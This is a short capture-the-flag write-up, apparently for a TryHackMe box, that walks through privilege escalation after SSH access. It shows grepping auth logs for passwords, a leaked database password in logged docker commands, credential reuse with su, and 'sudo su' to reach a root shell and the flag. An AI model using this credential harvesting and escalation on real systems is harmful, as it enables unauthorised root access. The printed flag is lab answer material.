-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathprivEscRoot
61 lines (47 loc) · 4.21 KB
/
privEscRoot
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#Privaledge Escalation after successful SSH login - THM box
After a successful SSH login an crack and login, run this command once ```cd ..``` enough to cat root, but
do not haved access into the root folder.
```cat /var/log/auth* | grep -i pass```
This specific example output:
tim@silver-platter:/$ cat /var/log/auth* | grep -i pass
Jan 15 01:35:09 silver-platter sshd[2972]: Accepted password for tim from 10.10.58.77 port 38358 ssh2
May 8 08:58:40 silver-platter sshd[1710]: Accepted password for tyler from 192.168.1.20 port 42258 ssh2
May 8 14:00:53 silver-platter sshd[1946]: Accepted password for tyler from 192.168.1.20 port 55742 ssh2
Dec 12 19:34:40 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 12 19:34:46 silver-platter passwd[1576]: pam_unix(passwd:chauthtok): password changed for tim
Dec 12 19:39:15 silver-platter sudo: tyler : 3 incorrect password attempts ; TTY=tty1 ; PWD=/home/tyler ; USER=root ; COMMAND=/usr/bin/apt install nginx
Dec 13 15:39:07 silver-platter usermod[1597]: change user 'dnsmasq' password
Dec 13 15:39:07 silver-platter chage[1604]: changed password expiry for dnsmasq
Dec 13 15:40:33 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_$H12=R13h- -v postgresql-data:/var/lib/postgresql/data postgres:12.3
Dec 13 15:44:30 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_$H12=R13h- -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database sivlerpeas:silverpeas-6.3.1
Dec 13 15:45:21 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_$H12=R13h- -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:silverpeas-6.3.1
Dec 13 15:45:57 silver-platter sudo: tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_$H12=R13h- -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:6.3.1
Dec 13 16:17:21 silver-platter sudo: tyler : TTY=tty1 ; PWD=/etc/nginx/sites-available ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 13 16:17:31 silver-platter passwd[6811]: pam_unix(passwd:chauthtok): password changed for tim
Dec 13 16:18:57 silver-platter sshd[6879]: Accepted password for tyler from 192.168.1.20 port 47772 ssh2
Dec 13 16:32:41 silver-platter sudo: tyler : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/passwd tim
Dec 13 16:32:54 silver-platter passwd[7174]: pam_unix(passwd:chauthtok): password changed for tim
Dec 13 16:33:12 silver-platter sshd[7181]: Accepted password for tim from 192.168.1.20 port 50970 ssh2
Dec 13 16:35:45 silver-platter sshd[7297]: Accepted password for tyler from 192.168.1.20 port 58172 ssh2
Dec 13 16:45:33 silver-platter sshd[7622]: Accepted password for tyler from 192.168.1.20 port 33484 ssh2
Dec 13 17:43:09 silver-platter sshd[7750]: Accepted password for tyler from 192.168.1.20 port 45796 ssh2
Dec 13 17:51:30 silver-platter sshd[1370]: Accepted password for tyler from 192.168.1.20 port 60860 ssh2
Dec 13 17:51:41 silver-platter sshd[1681]: Accepted password for tyler from 192.168.1.20 port 55392 ssh2
## SUDO Login from the root admin
su tyler
psswd:[found_above_in_output]
Successfully logged in to root at tyler@silver-platter:/
Note: I obfuscated password so you can not copy and paste the actual password to retrieve root flag.
Run the commands when your box is live to solve.
After
```sudo -l``` to inspect possible root commands followed by ```sudo su``` to spawn a root shell then enter the password to gain
access to root docus and config files.
once login confirmed:
[sudo] password for tyler: [found_above]
root@silver-platter:/# cd root
root@silver-platter:~# ls
root.txt snap start_docker_containers.sh
root@silver-platter:~# cat root.txt
THM{0f0i0n0d_0i0t_0y0o0u0r0s0e0l0f}
root@silver-platter:~#
<3